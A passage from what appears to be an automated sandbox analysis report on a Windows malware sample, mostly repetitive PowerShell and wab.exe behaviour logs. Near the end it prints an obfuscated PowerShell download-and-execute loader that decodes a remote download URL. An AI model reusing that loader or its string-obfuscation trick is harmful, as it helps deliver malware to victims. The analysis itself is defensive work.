              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21D40000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21C10000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6669Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3220Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8452Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1359Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4840Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4953Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 8452 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 1359 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7196Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7196Thread sleep time: -29514790517935264s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7080Thread sleep count: 4840 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7080Thread sleep count: 4953 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000009.00000002.2018581761.0000012CF68E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk%SystemRoot%\system32\mswsock.dlly
              Source: wab.exe, 00000011.00000002.2582688527.00000000062CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00EFD6E4 LdrInitializeThunk,LdrInitializeThunk,13_2_00EFD6E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7308.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7FE48Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern 